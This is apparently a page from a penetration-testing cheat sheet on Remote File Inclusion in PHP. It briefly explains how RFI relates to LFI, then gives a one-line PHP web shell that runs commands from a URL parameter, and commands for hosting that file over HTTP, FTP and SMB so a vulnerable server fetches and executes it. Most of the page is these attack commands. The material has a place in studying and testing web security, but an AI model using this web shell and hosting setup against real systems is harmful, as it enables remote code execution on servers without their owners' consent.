RFI

Almost any RFI vulnerability is also an LFI vulnerability, as any function that allows including remote URLs usually also allows including local ones. However, an LFI may not necessarily be an RFI. This is primarily because of three reasons:

The vulnerable function may not allow including remote URLs
You may only control a portion of the filename and not the entire protocol wrapper (ex: http://, ftp://, https://).
The configuration may prevent RFI altogether, as most modern web servers disable including remote files by default.

Remote Code Execution

$ echo '<?php system($_GET["cmd"]); ?>' > shell.php

HTTP

$ sudo python3 -m http.server <LISTENING_PORT>

FTP

$ sudo python -m pyftpdlib -p 21

SMB

$ impacket-smbserver -smb2support share $(pwd)

PreviousPHP Wrappers Nextwith phpinfo()

Last updated 2 years ago

hashtagRemote Code Execution

hashtagHTTP

hashtagFTP

hashtagSMB

Remote Code Execution

HTTP

FTP

SMB